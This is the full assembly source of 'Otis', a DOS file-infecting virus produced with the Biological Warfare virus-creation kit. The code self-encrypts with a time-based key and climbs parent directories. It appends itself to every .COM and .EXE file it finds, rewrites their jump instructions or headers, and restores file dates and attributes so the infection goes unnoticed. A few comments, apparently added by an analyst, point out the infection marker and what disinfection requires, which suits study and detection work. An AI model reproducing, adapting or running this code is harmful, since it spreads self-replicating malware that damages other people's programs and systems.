
  1. ; otis : Otis (c) by HypoDermic!! Part of the Mayberry Family!!
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  4. PING            equ     0BF4Eh                  ; declared but not referenced anywhere in this listing
  5. MARKER          equ     06864h                  ; infection marker: written into an infected .EXE header's initial-SP word (read_buffer+16) and compared with SP at entry; a fixed header value a scanner or YARA rule can key on
  6.  
  7. code            segment
  8.                 org     100h
  9.                 assume  cs:code,ds:code
  10.  
  11. start:
  12.                 db      0E9h,3,0          ; to virus
  13. host:
  14.                 db      0CDh,20h,0        ; host program
  15. virus_begin:
  16.  
  17.                 db      0BBh                    ; decryption module
  18. code_offset     dw      offset virus_code
  19.                 mov     cx,VIRUS_SIZE / 2 + 1
  20.  
  21. decrypt:
  22.                 db      02Eh,081h,07h           ; ADD CS:[BX]
  23. cipher          dw      0
  24.                 inc     bx
  25.                 inc     bx
  26.                 loop    decrypt
  27.  
  28.  
  29. virus_code:
  30.                 call    $ + 3             ; BP is instruction ptr.
  31.                 pop     bp
  32.                 sub     bp,offset $ - 1
  33.  
  34.                 push    ds es
  35.  
  36.                 push    cs
  37.                 pop     ds
  38.                 lea     dx,[bp + offset new_DTA]
  39.                 mov     ah,1Ah
  40.                 int     21h
  41.  
  42.                 push    [bp + exe_cs]
  43.                 push    [bp + exe_ip]
  44.                 push    [bp + exe_ss]
  45.                 push    [bp + exe_sp]
  46.                 call    traverse
  47.  
  48.                 pop     [bp + exe_sp]
  49.                 pop     [bp + exe_ss]
  50.                 pop     [bp + exe_ip]
  51.                 pop     [bp + exe_cs]
  52.                 pop     es ds
  53.                 mov     dx,80h
  54.                 mov     ah,1Ah
  55.                 int     21h
  56.  
  57.                 cmp     sp,MARKER               ; check for .EXE
  58.                 je      exe_exit
  59.  
  60. com_exit:
  61.                 lea     si,[bp + host]          ; restore host program
  62.                 mov     di,100h
  63.                 push    di
  64.                 movsw
  65.                 movsb
  66.  
  67.                 call    fix_regs                ; fix up registers
  68.                 ret                             ; and leave
  69. exe_exit:
  70.                 mov     ax,ds                   ; fix up return address
  71.                 add     ax,10h
  72.                 push    ax
  73.                 add     ax,cs:[bp + exe_cs]
  74.                 mov     cs:[bp + return_cs],ax
  75.  
  76.                 mov     ax,cs:[bp + exe_ip]
  77.                 mov     cs:[bp + return_ip],ax
  78.  
  79.                 pop     ax
  80.                 add     ax,cs:[bp + exe_ss]        ; restore stack
  81.                 cli
  82.                 mov     ss,ax
  83.                 mov     sp,cs:[bp + exe_sp]
  84.  
  85.                 call    fix_regs                ; fix up registers
  86.                 sti
  87.  
  88.                 db      0EAh                    ; back to host program
  89. return_ip       dw      0
  90. return_cs       dw      0
  91.  
  92. exe_cs          dw      -16                     ; orig CS:IP
  93. exe_ip          dw      103h
  94. exe_sp          dw      -2                      ; orig SS:SP
  95. exe_ss          dw      -16
  96.  
  97. fix_regs:
  98.                 xor     ax,ax
  99.                 cwd
  100.                 xor     bx,bx
  101.                 mov     si,100h
  102.                 xor     di,di
  103.                 xor     bp,bp
  104.                 ret
  105.  
  106.  
  107. traverse:
  108.                 sub     sp,64                   ; allocate stack space
  109.                 mov     si,sp
  110.                 inc     si
  111.                 mov     ah,47h                  ; get current directory
  112.                 xor     dl,dl
  113.                 push    ds
  114.                 push    ss
  115.                 pop     ds
  116.                 int     21h
  117.  
  118.                 pop     ds
  119.                 dec     si
  120.                 mov     byte ptr ss:[si],'\' ; fix directory
  121.  
  122. next_dir:
  123.                 call    infect_dir
  124.  
  125.                 lea     dx,[bp + outer]         ; repeat in next dir up
  126.                 mov     ah,3Bh
  127.                 int     21h
  128.                 jnc     next_dir
  129.  
  130. traverse_done:
  131.                 add     sp,64                   ; reset
  132.                 mov     dx,si
  133.                 push    ds
  134.                 push    ss
  135.                 pop     ds
  136.                 mov     ah,3Bh
  137.                 int     21h
  138.                 pop     ds
  139.                 ret
  140.  
  141. infect_dir:
  142.                 mov     ah,4Eh
  143.                 lea     dx,[bp + find_me]
  144.                 int     21h
  145.                 jc      infect_done
  146.  
  147. next_file:
  148.                 lea     dx,[bp + new_DTA + 1Eh]
  149.                 call    file_open
  150.                 mov     ah,4Fh
  151.                 int     21h
  152.                 jnc     next_file
  153.  
  154. infect_done:
  155.                 ret
  156.  
  157. file_open:
  158.                 push    ax cx di es
  159.                 call    get_extension
  160.                 cmp     [di],'OC'               ; .COM file?
  161.                 jne     perhaps_exe             ; perhaps .EXE then
  162.                 cmp     byte ptr [di + 2],'M'
  163.                 jne     not_prog
  164.                 jmp     a_program
  165. perhaps_exe:
  166.                 cmp     [di],'XE'               ; .EXE file?
  167.                 jne     not_prog
  168.                 cmp     byte ptr [di + 2],'E'
  169.                 jne     not_prog
  170. a_program:
  171.                 pop     es di cx ax
  172.                 jmp     execute                 ; infect file
  173. not_prog:
  174.                 pop     es di cx ax
  175.                 ret
  176.  
  177. execute:
  178.                 push    si
  179.  
  180.                 mov     ax,4300h                ; change attributes
  181.                 int     21h
  182.  
  183.                 push    cx dx ds
  184.                 xor     cx,cx
  185.                 call    set_attributes
  186.  
  187.                 mov     ax,3D02h                ; open file
  188.                 int     21h
  189.                 jc      cant_open
  190.                 xchg    bx,ax
  191.  
  192.                 mov     ax,5700h                ; save file date/time
  193.                 int     21h
  194.                 push    cx dx
  195.                 mov     ah,3Fh
  196.                 mov     cx,28
  197.                 lea     dx,[bp + read_buffer]
  198.                 int     21h
  199.  
  200.                 cmp     word ptr [bp + read_buffer],'ZM'
  201.                 je      infect_exe              ; yes, infect as .EXE
  202.  
  203.                 mov     al,2                    ; move to end of file
  204.                 call    move_file_ptr
  205.  
  206.                 sub     dx,VIRUS_SIZE + 3       ; check for previous infection
  207.                 cmp     dx,word ptr [bp + read_buffer + 1]
  208.                 je      dont_infect
  209.  
  210.                 add     dx,VIRUS_SIZE + 3
  211.                 mov     word ptr [bp + new_jump + 1],dx
  212.  
  213.                 add     dx,103h
  214.                 call    encrypt_code            ; encrypt virus
  215.  
  216.                 lea     dx,[bp + read_buffer]   ; save original program head
  217.                 int     21h
  218.                 mov     ah,40h                  ; write virus to file
  219.                 mov     cx,VIRUS_SIZE
  220.                 lea     dx,[bp + encrypt_buffer]
  221.                 int     21h
  222.  
  223.                 xor     al,al                   ; back to beginning of file
  224.                 call    move_file_ptr
  225.  
  226.                 lea     dx,[bp + new_jump]
  227.                 int     21h
  228.  
  229. fix_date_time:
  230.                 pop     dx cx
  231.                 mov     ax,5701h                ; restore file date/time
  232.                 int     21h
  233.  
  234. close:
  235.                 pop     ds dx cx                ; restore attributes
  236.                 call    set_attributes
  237.  
  238.                 mov     ah,3Eh                  ; close file
  239.                 int     21h
  240.  
  241. cant_open:
  242.                 pop     si
  243.                 ret
  244.  
  245.  
  246. set_attributes:
  247.                 mov     ax,4301h
  248.                 int     21h
  249.                 ret
  250.  
  251. dont_infect:
  252.                 pop     cx dx                   ; can't infect, skip
  253.                 jmp     close
  254.  
  255. move_file_ptr:
  256.                 mov     ah,42h                  ; move file pointer
  257.                 cwd
  258.                 xor     cx,cx
  259.                 int     21h
  260.  
  261.                 mov     dx,ax                   ; set up registers
  262.                 mov     ah,40h
  263.                 mov     cx,3
  264.                 ret
  265. infect_exe:
  266.                 cmp     word ptr [bp + read_buffer + 16],MARKER
  267.                 je      dont_infect             ; infected already
  268.  
  269.                 les    ax,dword ptr [bp + read_buffer + 20]
  270.                 mov    [bp + exe_cs],es
  271.                 mov    [bp + exe_ip],ax
  272.                 les    ax,dword ptr [bp + read_buffer + 14]
  273.                 mov    [bp + exe_ss],ax
  274.                 mov    [bp + exe_sp],es
  275.                 mov    word ptr [bp + read_buffer + 16],MARKER
  276.                 mov     ax,4202h                ; to end of file
  277.                 cwd
  278.                 xor     cx,cx
  279.                 int     21h
  280.  
  281.                 push    ax dx                   ; save file size
  282.  
  283.                 push    bx
  284.                 mov     cl,12                   ; calculate offsets for CS
  285.                 shl     dx,cl                   ; and IP
  286.                 mov     bx,ax
  287.                 mov     cl,4
  288.                 shr     bx,cl
  289.                 add     dx,bx
  290.                 and     ax,15
  291.                 pop     bx
  292.  
  293.                 sub    dx,word ptr [bp + read_buffer + 8]
  294.                 mov    word ptr [bp + read_buffer + 22],dx
  295.                 mov    word ptr [bp + read_buffer + 20],ax
  296.                 add    dx,100h
  297.                 mov    word ptr [bp + read_buffer + 14],dx
  298.  
  299.                 pop     dx ax                   ; calculate prog size
  300.  
  301.                 add     ax,VIRUS_SIZE
  302.                 adc     dx,0
  303.                 mov     cx,512                  ; in pages
  304.                 div     cx                      ; then save results
  305.                 inc     ax
  306.                 mov     word ptr [bp + read_buffer + 2],dx
  307.                 mov     word ptr [bp + read_buffer + 4],ax
  308.                 mov     dx,word ptr [bp + read_buffer + 20]
  309.                 call    encrypt_code            ; encrypt virus
  310.  
  311.  
  312.                 mov     ah,40h
  313.                 mov     cx,VIRUS_SIZE + 3
  314.                 lea     dx,[bp + encrypt_buffer]
  315.                 int     21h
  316.  
  317.  
  318.                 mov     ax,4200h                ; back to beginning
  319.                 cwd
  320.                 xor     cx,cx
  321.                 int     21h
  322.  
  323.                 mov     ah,40h                  ; and fix up header
  324.                 mov     cx,28
  325.                 lea     dx,[bp + read_buffer]
  326.                 int     21h
  327.                 jmp     fix_date_time           ; done
  328.  
  329. courtesy_of     db      '[BW]',0                ; embedded text; lies inside the region encrypt_code encodes, so file copies carry it under a per-infection key and it is clear-text only in memory after the decrypt loop
  330. signature       db      'Otis (c) by HypoDermic!! Part of the Mayberry Family!!',0   ; same: recoverable from a memory image, not from a plain on-disk string scan
  331.  
  332.  
  333. encrypt_code:
  334.                 push    ax cx
  335.  
  336.                 push    dx
  337.                 xor     ah,ah                   ; get time for random number
  338.                 int     1Ah
  339.  
  340.                 mov    [bp + cipher],dx
  341.                 pop     cx
  342.                 add     cx,virus_code - virus_begin
  343.                 mov     [bp + code_offset],cx
  344.                 push    cs                      ; ES = CS
  345.                 pop     es
  346.  
  347.                 lea     si,[bp + virus_begin]
  348.                 lea     di,[bp + offset encrypt_buffer]
  349.                 mov     cx,virus_code - virus_begin
  350.                 rep     movsb
  351.  
  352.                 mov     cx,VIRUS_SIZE / 2 + 1
  353. encrypt:
  354.                 lodsw                           ; encrypt virus code
  355.                 sub     ax,dx
  356.                 stosw
  357.                 loop    encrypt
  358.  
  359.                 pop     cx ax
  360.                 ret
  361.  
  362. get_extension:
  363.                 push    ds                      ; find extension
  364.                 pop     es
  365.                 mov     di,dx
  366.                 mov     cx,64
  367.                 mov     al,'.'
  368.                 repnz   scasb
  369.                 ret
  370.  
  371. find_me         db      '*.*',0                 ; find-first pattern used by infect_dir: every file is a candidate; the .COM/.EXE filter is done by name in file_open
  372. outer           db      '..',0                  ; chdir target traverse uses to climb one directory level
  373.  
  374. new_jump        db      0E9h,0,0                ; 3-byte JMP stub: an infected .COM begins with these bytes; the host's original first 3 bytes are kept in the appended body (saved from read_buffer), which is what a disinfector must restore
  375.  
  376. infections      db      0                       ; declared but never referenced in this listing
  377. virus_end:
  378. VIRUS_SIZE      equ     virus_end - virus_begin ; size of the body appended to hosts; the three buffers below lie outside it
  379. read_buffer     db      28 dup (?)              ; read buffer (uninitialized scratch past virus_end; not written to infected files)
  380. new_DTA         db      128 dup(?)              ; private DTA for the find-first/next calls (scratch, not part of the appended body)
  381. encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer (scratch; holds the encoded copy that is written to a file)
  382.  
  383. end_heap:
  384.  
  385. MEM_SIZE        equ     end_heap - start        ; not referenced anywhere in this listing
  386.  
  387. code            ends
  388.                 end     start